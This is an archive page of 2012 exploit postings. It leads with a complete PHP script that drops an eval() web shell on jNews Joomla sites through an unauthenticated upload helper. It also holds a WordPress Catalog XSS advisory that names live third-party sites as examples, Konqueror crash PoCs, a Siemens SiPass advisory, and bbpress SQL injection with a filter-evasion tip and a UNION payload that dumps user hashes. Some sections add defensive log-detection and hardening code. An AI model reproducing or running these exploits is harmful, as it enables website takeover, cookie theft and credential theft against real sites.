Archive for 01 November 2012

jNews com_jnews 7.0.0 => 7.7.5 execute arbitrary PHP code

<?php

# jNews 7.0.0 - 7.7.5 ~ Exploit [46]
# http://hackforums.net/member.php?action=profile&uid=42381
#
# Arbitrary file write through the bundled Open Flash Chart helper
# ofc_upload_image.php: the raw POST body is stored under tmp-upload-images/
# with the file name taken from the "name" query parameter.

echo <<<EOT

-----------------------------------
/   jNews 7.0.0 - 7.7.5 ~ Exploit   \
\           Author: Phizo           /
-----------------------------------


EOT;

$options = getopt('u:f:');

if (!isset($options['u'], $options['f'])) {
    die("\n        Usage example: php jnews.php -u http://target.com/ -f shell.php\n
-u http://target.com/    The full path to Joomla!
-f shell.php             The name of the file to create.\n");
}

$url  = rtrim($options['u'], '/') . '/';   # exactly one trailing slash
$file = $options['f'];

# Where the written file ends up, and the upload endpoint itself.
$shell = "{$url}components/com_jnews/includes/openflashchart/tmp-upload-images/{$file}";
$url   = "{$url}components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name={$file}";

# Body that becomes the new file: a one-line eval() backdoor.
$data = "<?php eval(\$_GET['cmd']); ?>";

# text/plain keeps PHP from parsing the body as a form, so the script
# receives it untouched in $HTTP_RAW_POST_DATA.
$headers = array(
    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
    'Content-Type: text/plain',
);

echo "        [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);   # raw POST body
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);
curl_close($handle);

# The PHP notice below means the server never populated the raw POST body,
# so nothing was written. Otherwise confirm by fetching the dropped file.
if (strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') === false && @fopen($shell, 'r')) {
    echo "        [+] Exploit completed successfully!\n";
    echo "        ______________________________________________\n\n        {$shell}?cmd=system('id');\n";
} else {
    die("        [+] Exploit was unsuccessful.\n");
}

?>
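Whether or not the exploit above was ever run against a site, the two requests it makes stand out in an access log: a POST to php-ofc-library/ofc_upload_image.php carrying a name= parameter, followed by a request for that same name under tmp-upload-images/. The script below is an added example written for this page (it is not part of the exploit, of jNews or of Open Flash Chart) that walks Apache combined-format log lines and flags that pattern. The log lines, client addresses and the list of executable extensions are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample log lines in Apache combined format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Nov/2012:10:15:01 +0200] "GET /index.php?option=com_jnews HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Nov/2012:10:15:09 +0200] "POST /components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=shell.php HTTP/1.1" 200 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0)"
203.0.113.7 - - [01/Nov/2012:10:15:11 +0200] "GET /components/com_jnews/includes/openflashchart/tmp-upload-images/shell.php?cmd=system('id') HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0)"
198.51.100.4 - - [01/Nov/2012:10:16:30 +0200] "POST /components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Nov/2012:10:17:02 +0200] "GET /components/com_jnews/includes/openflashchart/tmp-upload-images/chart.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_PATH = "/openflashchart/php-ofc-library/ofc_upload_image.php"
DROP_DIR = "/openflashchart/tmp-upload-images/"
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")   # assumed server-side extensions


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["path"], rec["query"] = url.path, parse_qs(url.query)
    return rec


def analyze(log_text):
    """Return findings as dicts with severity, client IP, file name and timestamp.

    HIGH:   an upload with an executable extension followed by a request for the dropped file
    MEDIUM: an upload whose name= has an executable extension (attempt, not yet confirmed)
    LOW:    any other call to the upload endpoint (it should never be reachable unauthenticated)
    """
    uploads = {}   # file name -> record of the POST that created it
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].endswith(UPLOAD_PATH):
            name = rec["query"].get("name", [""])[0]
            uploads[name] = rec
            sev = "MEDIUM" if name.lower().endswith(EXEC_EXT) else "LOW"
            findings.append({"severity": sev, "ip": rec["ip"], "file": name, "ts": rec["ts"]})
        elif DROP_DIR in rec["path"]:
            name = rec["path"].rsplit("/", 1)[-1]
            if name in uploads and name.lower().endswith(EXEC_EXT):
                findings.append({"severity": "HIGH", "ip": rec["ip"], "file": name,
                                 "ts": rec["ts"], "cmd": rec["query"].get("cmd", [None])[0]})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

On a real server the same logic can be pointed at the live log; a LOW finding is still worth a look, because a legitimate chart upload only ever comes from the site's own Flash component, not from a browser session.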

WordPress Plugin Catalog HTML Code Injection and XSS

An HTML code injection and cross-site scripting (XSS) vulnerability has been found in the WordPress Catalog plugin; the discoverer's description is as follows:

Exploit Title: WordPress Plugin Catalog HTML Code Injection and Cross-site scripting 
 
Dork: N/A 
 
Author: Daniel Barragan "D4NB4R" 
 
Twitter: @D4NB4R 
 
Vendor: http://wordpress.org/extend/plugins/catalog/ 
 
Version: 1.1 
 
License: Non-Commercial 
 
Demo: http://www.web-dorado.com/products/wordpress-catalog.html 
 
Download: http://downloads.wordpress.org/plugin/catalog.zip 
 
Tested on: [Linux(Arch)-Windows(7ultimate)] 
 
 
 
Description:
 
Spider WordPress Product Catalog plugin is a convenient tool for organizing the products represented on  
your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes 
it easier for the customers to search and identify the needed products within the WordPress catalog. It  
is possible to add an unlimited number of parameters for each of the categories in the catalog in order to 
allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can  
be accompanied with an image. 
 
 
Vulnerable Parameter Name:  
 
?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id} 
 
The flaw occurs when submitting product reviews ("view=showproduct"), allowing the attacker
to send whatever code they like; the form's $_POST data is not validated, so the code is stored in the database.
 
 
Exploit 1:   
 
HTML Code Injection  
 
 
 
1. Select any of the products and click it to open its details page.

2. Once there, post your code in the form titled "Add your comment here".
 
An example of html: 
 
<center><marquee><h1>HTML code Injection Tested By D4NB4R</h1></marquee></center> 
 
 
 
http://localhost/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id} 
 
 
 
 
Exploit 2:  
 
Cross-site scripting  
 
 
 
1. Select any of the products and click it to open its details page.

2. Once there, post your code in the form titled "Add your comment here".
 
An example of possible xss:  
 
<script>alert(document.cookie)</script> 
<script>alert("Xss by D4NB4R")</script> 
 
 
 
http://localhost/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id} 
 
http://richotoole.com/prairiemtn/catalog/ladies/?s_p_c_t=1342&product_id=5&view=showproduct&page_num=1&back=1 
 
http://floralmodelling.com.ua/молды?s_p_c_t=1342&product_id=6&view=showproduct&page_num=1&back=1 
 
http://wpdemo.web-dorado.com/catalog/?s_p_c_t=1342&product_id=4&view=showproduct&page_num=1&back=1 
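The difference between the two payloads above being stored harmlessly and being injected is whether the plugin emits the comment as encoded text or as live markup. The following is an added example, not code from the Catalog plugin or from the advisory: it pushes a comment through a constructed stand-in page, once echoing it raw (the behaviour the advisory describes) and once HTML-escaped, and classifies where a marker string comes back in the served HTML. The page template, the marker string and the helper names are assumptions made for the demonstration.

```python
import html
from html.parser import HTMLParser

# The advisory's two payloads, with a marker we can look for in the response.
PAYLOADS = {
    "html":   '<center><marquee><h1>{m}</h1></marquee></center>',
    "script": '<script>alert("{m}")</script>',
}
PAYLOAD_TAGS = ("marquee", "h1", "script")


class _Walker(HTMLParser):
    """Record in which syntactic position the marker reappears in the served page."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=True)   # &lt; comes back as '<' in text data
        self.marker = marker
        self.stack = []          # open elements
        self.positions = set()   # "script", "attribute", "text" plus enclosing tag names

    def handle_starttag(self, tag, attrs):
        self.stack.append(tag)
        if any(self.marker in (value or "") for _, value in attrs):
            self.positions.add("attribute")

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, -1, -1):   # pop to the nearest matching open tag
            if self.stack[i] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if self.marker in data:
            self.positions.add("script" if "script" in self.stack else "text")
            self.positions.update(self.stack)


def classify(page_html, marker, payload_tags=PAYLOAD_TAGS):
    """'executable', 'markup', 'escaped' or 'absent' for how the marker came back."""
    walker = _Walker(marker)
    walker.feed(page_html)
    walker.close()
    seen = walker.positions
    if "script" in seen or "attribute" in seen:
        return "executable"   # comment became live script (or a scriptable attribute)
    if seen & set(payload_tags):
        return "markup"       # the injected elements were rendered: HTML injection
    if "text" in seen:
        return "escaped"      # came back as text only: encoded before output
    return "absent"


def render_comment_page(comment, escape_output):
    """Constructed stand-in for the product page; vulnerable when escape_output is False."""
    body = html.escape(comment) if escape_output else comment
    return ('<html><body><div class="product"><h2>Product</h2>'
            '<div class="comment">%s</div></div></body></html>' % body)


def check_stored_xss(marker="xsscheck7f3a"):
    """Run both payloads through the raw and the escaped renderer; map (kind, mode) -> class."""
    results = {}
    for kind, template in PAYLOADS.items():
        payload = template.format(m=marker)
        for mode in ("vulnerable", "hardened"):
            page = render_comment_page(payload, escape_output=(mode == "hardened"))
            results[(kind, mode)] = classify(page, marker)
    return results


if __name__ == "__main__":
    for key, verdict in check_stored_xss().items():
        print(key, verdict)
```

Against a live site, replace render_comment_page with the HTTP fetch of the product page after submitting the comment; the classifier does not change. A verdict of "markup" is already a finding even when no script runs, since the injected elements are served to every later visitor.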
 
 
Greetz:  All Member Inj3ct0r  Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha 
* shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic 
* Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel 
* L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects 
* aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe 
* ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te  

SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference

IOActive Security Advisory
Title: SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference
Severity: Critical
Discovered by: Lucas Apa
Date Reported: 09/11/12
CVE: TBD
Siemens Advisory: SSA-938777

Introduction

SIEMENS SiPass® Integrated is an extremely powerful and flexible access control system that provides a very high level of security without compromising convenience and ease of access for system users. As a result, thousands of corporations, airports, ports, government agencies, hospitals, universities, and other organizations worldwide are using SiPass integrated access control systems. The system also provides a complete range of reports and can handle a large number of external controls, including elevator controls, alarm outputs, machine controls, and fire alarm inputs.

Affected Products

SIEMENS SiPass Integrated MP2.6 and earlier

Threat and Impact

The vulnerability exists within AscoServer.exe during the handling of RPC messages over the Ethernet Bus. Insufficient sanity checking allows remote and unauthenticated attackers to corrupt a Heap-Allocated Structure and then dereference an arbitrary pointer.
This flaw allows remote attackers to execute arbitrary code on the target system, under the context of the SYSTEM account, where the vulnerable versions of SIEMENS SiPass Integrated are installed.
More advanced payloads could modify the behavior of the application’s internal controllers to unlock doors, control specific hardware, or expose businesses to other security risks.

Technical Details

The main communication channel that the Server uses to communicate with ACC Controllers is Ethernet. Each controller sends and receives messages to and from the Server and the hardware devices that monitor the system. All the components used in the SiPass integrated system are ultimately connected to the Server.

There is virtually no limit to the total number of controllers that can be connected. Various networking options (LAN/WAN/PSTN) can expand the system to include buildings and locations all over the world.

AscoServer is the executable used by the SiPass server that acts as the gateway to remotely access SiPass resources on port 4343.

The Ethernet Bus library connects the Server to the advanced Central Controllers (ACC) and allows communication between the Server and defined devices and points. Ethernet communication means that AscoServer doesn’t need a dedicated Bus, because both Windows and the ACC understand the TCP/IP protocol used to send and receive messages over Ethernet networks.

After creating an I/O completion port with an existing file descriptor, the server begins listening for IOCP messages on that port. When the server receives an IOCP message, it creates substructure elements that are copied into shared memory between threads.

Due to insufficient sanity checking when manipulating an IOCP message, it is possible to alter the behavior of message parsing, allowing another IOCP message to subvert the listener of IOCP messages, leading to export of a write-n primitive.

0BD0F8B4 0B44A7A1 /CALL to memcpy from Ethernet.0B44A79C
0BD0F8B8 0000FE00 |dest = [[[[[user controlled ptr]]]]
0BD0F8BC 0BF0D5D0 |src = 0BF0D5D0 # [[[[[ptr to content]]]]]
0BD0F8C0 00000BB8 n = BB8 (3000.)


This allows an attacker to write arbitrary data within the application, leading to remote code execution. Since the application spawns multiple threads for handling Ethernet connections, one approach for exploiting the vulnerability would be to overwrite a pointer to the first exception handler in any of the Thread Environment Block (TEB) structures and seize control of the exception-handling thread after an access violation. Even though Thread data blocks are randomized, addresses are stable because multiple identical threads are created.
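The trace above is a memcpy whose destination is derived from message content: the length and target of the copy are trusted, so one message can overwrite a neighbouring heap structure and plant the pointer that the server later dereferences. The following is an added model of that bug class written for this page, not SiPass or AscoServer code: a flat "heap" holding a connection record next to a structure with a callback pointer, a constructed wire format (u16 offset, u16 length, payload), and the parser once without and once with the sanity check. All offsets, sizes and addresses are constructed.

```python
import struct

# Constructed layout: the connection record owns the first 0x40 bytes; the
# structure right after it begins with a 4-byte pointer to the listener callback.
HEAP_SIZE = 0x100
CONN_OFF = 0x00
CONN_SIZE = 0x40
LISTENER_OFF = 0x40
ORIG_LISTENER = 0x00401000        # constructed "legitimate" callback address


def fresh_heap():
    heap = bytearray(HEAP_SIZE)
    struct.pack_into("<I", heap, LISTENER_OFF, ORIG_LISTENER)
    return heap


def listener_pointer(heap):
    return struct.unpack_from("<I", heap, LISTENER_OFF)[0]


def memcpy(heap, dest, src):
    """Flat copy; leaving the heap altogether is the access violation the advisory mentions."""
    if dest < 0 or dest + len(src) > len(heap):
        raise MemoryError("access violation at 0x%x" % dest)
    heap[dest:dest + len(src)] = src


def parse_vulnerable(heap, msg):
    """Offset and length come straight from the message: dest is attacker controlled."""
    off, n = struct.unpack_from("<HH", msg, 0)
    memcpy(heap, CONN_OFF + off, bytes(msg[4:4 + n]))


def parse_hardened(heap, msg):
    """Same format, but the copy must stay inside the record and match the payload."""
    off, n = struct.unpack_from("<HH", msg, 0)
    if n != len(msg) - 4:
        raise ValueError("length field does not match the payload")
    if off + n > CONN_SIZE:
        raise ValueError("copy of %d bytes at offset 0x%x would leave the record" % (n, off))
    memcpy(heap, CONN_OFF + off, bytes(msg[4:4 + n]))


def demo():
    benign = struct.pack("<HH", 0, 8) + b"HELLO123"
    # Offset chosen so the copy lands exactly on the neighbouring pointer field.
    evil = struct.pack("<HH", LISTENER_OFF - CONN_OFF, 4) + struct.pack("<I", 0x41414141)

    heap = fresh_heap()
    parse_vulnerable(heap, benign)
    before = listener_pointer(heap)
    parse_vulnerable(heap, evil)          # corrupts the adjacent structure
    after = listener_pointer(heap)        # what the server will dereference next

    heap2 = fresh_heap()
    parse_hardened(heap2, benign)
    try:
        parse_hardened(heap2, evil)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "before": before,
        "after": after,
        "hardened_rejects": rejected,
        "hardened_buffer": bytes(heap2[:8]),
        "hardened_listener": listener_pointer(heap2),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, hex(value) if isinstance(value, int) and not isinstance(value, bool) else value)
```

The model stops at the corrupted pointer; in the advisory the same step is what turns the write primitive into control of the thread's exception handler.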

Remediation

For customers of SiPass integrated MP2.4, MP2.5 and MP2.6, Siemens provides a software hotfix that fixes the vulnerability. Please contact customer support to acquire this hotfix. Siemens recommends that customers with earlier versions of SiPass integrated upgrade to one of the above versions. To acquire the software hotfix for SiPass integrated, please contact customer support at:
sp.support.de@siemens.com

Konqueror 4.7.3 Memory Corruption

Konqueror 4.7.3 Memory Corruption Dos/Poc


Nth Dimension Security Advisory (NDSA20121010)
Date: 10th October 2012
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: Konqueror 4.7.3 <http://konqueror.kde.org/>
Vendor: KDE <http://www.kde.org/>
Risk: Medium

Summary

The Konqueror web browser is vulnerable to a number of memory corruption
vulnerabilities.

This advisory comes in 4 related parts:

1) The Konqueror web browser is vulnerable to type confusion leading to memory
disclosure.  The root cause of this is the same as CVE-2010-0046 reported by
Chris Rohlf which affected WebKit.

2) The Konqueror web browser is vulnerable to an out of bounds memory access
when accessing the canvas.  In this case the vulnerability was identified whilst
playing with bug #43813 from Google's Chrome repository.

3) The Konqueror web browser is vulnerable to a NULL pointer dereference leading
to a crash.

4) The Konqueror web browser is vulnerable to a "use-after-free" class flaw when
the context menu is used whilst the document DOM is being changed from within
Javascript.

These flaws were identified during an analysis of previously reported
vulnerabilities that affected Google's Chrome web browser.  It is believed that
only vulnerability 1 is/was common to the two code bases.

After discussions with the vendor, the following CVEs were assigned to these
vulnerabilities:

1) CVE-2012-4512
2) CVE-2012-4513
3) CVE-2012-4514
4) CVE-2012-4515

Solutions

Nth Dimension recommends that the vendor supplied patches should be applied:

1) a872c8a969a8bd3706253d6ba24088e4f07f3352
2) 1f8b1b034ccf1713a5d123a4c327290f86d17d53
3) 65464349951e0df9b5d80c2eb3cc7458d54923ae
4) 4f2eb356f1c23444fff2cfe0a7ae10efe303d6d8

Technical Details

1) Chris's blog post
(http://em386.blogspot.com/2010/12/webkit-css-type-confusion.html) nicely
describes this vulnerability.

It is worth noting that due to an overlap in bugs, our pre-advisory confused
CVE-2010-4577 and CVE-2010-0046.  Red Hat's bug entry for CVE-2010-4577
references the local() CSS function, whilst their bug entry for CVE-2010-0046
references the format() function (on very similar code paths).  In the case of
Konqueror, due to a slight reordering in calls, one patch (for CVE-2012-4512)
actually fixes both the format() and local() issue.

2) There was a sign-extension in calculating the dimensions of the canvas within
scaleLoop, which led to a miscalculated jump. According to KDE, in the case of
64-bit systems this appeared only to allow a crash to be triggered; however, on
32-bit systems it could lead to memory disclosure.

The following PoC can trigger the crash on vulnerable versions of Konqueror:

<html>
<body>
<canvas id="tutorial"></canvas>
<script type="text/javascript">
var canvas = document.getElementById("tutorial");
if (canvas.getContext) {
var ctx = canvas.getContext("2d");
canvas.width = 111111;
}
</script>
</body>
</html>

It is worth noting that unlike vulnerability 2, the code here is not shared
between WebKit and Konqueror.

3) Unfortunately I no longer have the stack trace for this crash; however it can be
triggered on vulnerable versions of Konqueror using the following PoC:

<html>
<body>
<iframe name="test" src="http://www.google.co.uk"></iframe>
<input type=button value="test"
onclick="window.open('javascript:alert(document.cookie)','test')" >
</body>
</html>

4) Accessing the context menu for a given iframe whilst the iframe is being
updated by the parent can lead to attempts to access no-longer existing objects.
This may lead to a crash, or potentially code execution, depending on the state
of the process at the point the no-longer existing object is accessed.

The following PoC can trigger the crash on vulnerable versions of Konqueror:

<html>
<body>
<script>
setInterval(function () {
document.body.innerHTML = "<iframe src=about:konqueror></iframe>";
}, 300);
</script>
</body>
</html>

History

On 27th July 2011, Nth Dimension contacted the KDE security team to report
vulnerability 1.

On 7th November 2011, Than Ngo of Red Hat re-reports vulnerability 1 and
Maksim Orlovich from KDE responds confirming that they have received the report
and it had been escalated to Maksim Orlovich, a KDE developer working on KHTML,
to determine the impact.  A proposed patch is made available on 13th November
2010.

Nth Dimension continue to examine bugs in WebKit that have been reported to
Google and on 1st November 2011 report vulnerability 2. Maksim responds quickly
but only to confirm receipt.  There are apparently issues in reproducing
vulnerability 2.  Maksim further responds on the 6th confirming that he now has
it working and has identified the root cause.

On 2nd February 2012, Jeff Mitchell of the KDE security team requests details of
the patches in order to make the vulnerability details public.  Maksim responds
that wires were crossed and he was waiting on KDE security team and Nth
Dimension.  Patch details as above are then supplied.

On 16th February 2012, Nth Dimension report vulnerabilities 3 and 4. The KDE
security team propose rolling all 4 bugs into 1 advisory assuming that the final
2 vulnerabilities can quickly be triaged.  Maksim responds on the 20th
confirming he has them reproduced and offering possible fixes.

Between February and October, Nth Dimension hear no further updates despite
chasing the KDE security team in June.

Nth Dimension proceed to post limited details to oss-security on 10th October
2012.

Following this, representatives from Red Hat and KDE liaised with Nth Dimension
to resolve the outstanding issues.  Further patches were supplied by David Faure
of KDE and tested by Jan Lieskovskyi and other members of the Red Hat security
team.  On 26th October 2012 an embargo was agreed to allow Nth Dimension and Red
Hat further time to review the supplied patch for vulnerability 4. KDE will
commit the proposed patch allowing disclosure on, or shortly after 29th October
2012.

Current

As of the 30th October 2012, the state of the vulnerabilities is believed to be
as follows.  Patches have been applied to Konqueror which resolve all
vulnerabilities.

Thanks

Nth Dimension would like to thank Jeff Mitchell, Maksim Orlovich and David Faure
of KDE as well as Jan Lieskovskyi, Vincent Danen, Kurt Seifried of the Red Hat
security team for the way they worked to resolve the issues.

WordPress bbpress Plugin Multiple Vulnerabilities

An SQL injection vulnerability has been found in the WordPress bbpress plugin; the discoverer's notes on the affected path and on how the flaw is used are as follows:

Souhail Hammou - Independent Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# Website : www.dark-puzzle.com
# Youtube : http://www.youtube.com/user/mariotrey
# E-mail   : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .
===========================================
# Exploit Title: WordPress plugins - bbpress Multiple Vulnerabilities
# Author: Dark-Puzzle (Souhail Hammou)
# OSVDB ID : 86400 & 86399 .
# Vendor Website : www.bbpress.ru  /  www.bbpress.com
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 , Backtrack 5 R3 .
----------------------------------------------------
I - SQL Injection Vulnerability :
----------------------------------------------------
bbpress plugin is prone to an SQL injection Vulnerability .
In cases where you run into a valid string column problem, try changing the syntax or using /**/ instead of spaces.

Note: Automated injection can be more effective in this case.

Example : 

http://www.example.com/wp-content/plugins/bbpress/forum.php?id=1&page=[Inject here] 
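To show what the page parameter above is exposed to, here is an added example (not bbpress code; the forum and user tables, column names and password hashes are constructed) in Python against SQLite. The vulnerable form splices id and page into the statement text, so a UNION placed in page pulls rows out of the users table, and it still does when spaces are replaced by /**/ as the advisory suggests, since the SQL tokenizer treats comments as whitespace. The hardened form validates both values as integers and binds them.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the forum tables; not bbpress's real schema."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE topics (topic_id INTEGER, forum_id INTEGER, page INTEGER, topic_title TEXT);
        CREATE TABLE users  (user_login TEXT, user_pass TEXT);
        INSERT INTO topics VALUES (1, 1, 1, 'Welcome'), (2, 1, 2, 'Rules'), (3, 2, 1, 'Off topic');
        INSERT INTO users  VALUES ('admin', '$P$BconstructedHash'), ('bob', '$P$BanotherHash');
    """)
    return db


def topics_vulnerable(db, forum_id, page):
    """Request parameters are spliced into the statement text, as in the vulnerable pattern."""
    sql = "SELECT topic_id, topic_title FROM topics WHERE forum_id = %s AND page = %s" % (forum_id, page)
    return db.execute(sql).fetchall()


def topics_hardened(db, forum_id, page):
    """Check the type each parameter is supposed to have, then bind it."""
    try:
        forum_id, page = int(forum_id), int(page)
    except (TypeError, ValueError):
        raise ValueError("forum id and page must be integers")
    sql = "SELECT topic_id, topic_title FROM topics WHERE forum_id = ? AND page = ?"
    return db.execute(sql, (forum_id, page)).fetchall()


def demo():
    db = build_db()
    injected = "0 UNION SELECT user_login, user_pass FROM users"
    # Same payload with every space replaced by an empty comment, per the advisory's tip.
    injected_comments = "0/**/UNION/**/SELECT/**/user_login,user_pass/**/FROM/**/users"
    out = {
        "normal": topics_vulnerable(db, 1, 1),
        "injected": topics_vulnerable(db, 1, injected),
        "injected_comments": topics_vulnerable(db, 1, injected_comments),
        "hardened_normal": topics_hardened(db, 1, 1),
    }
    try:
        topics_hardened(db, 1, injected)
        out["hardened_injected"] = "executed"
    except ValueError:
        out["hardened_injected"] = "rejected"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The integer cast is the important part: binding alone would also stop the injection, but rejecting non-numeric page values up front keeps the error out of the database layer, which is where the full path disclosure in the next section comes from.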

---------------------------------------------------
II - Full Path Disclosure Vulnerability :
---------------------------------------------------

The full path disclosure vulnerability in bbpress is triggered by passing an array as the parameter.

Example :

www.example.com/path/bbpress/topic.php?id[]=12&replies=3

Error : Warning: urlencode() expects parameter 1 to be string, array given in /Full/Path/Here on line 786

---------------------------------------------------
III - Directory Listing Vulnerability :
---------------------------------------------------

www.example.com/PATH/bbpress/bb-templates/kakumei/
www.example.com/PATH/bbpress/bb-templates/kakumei-blue/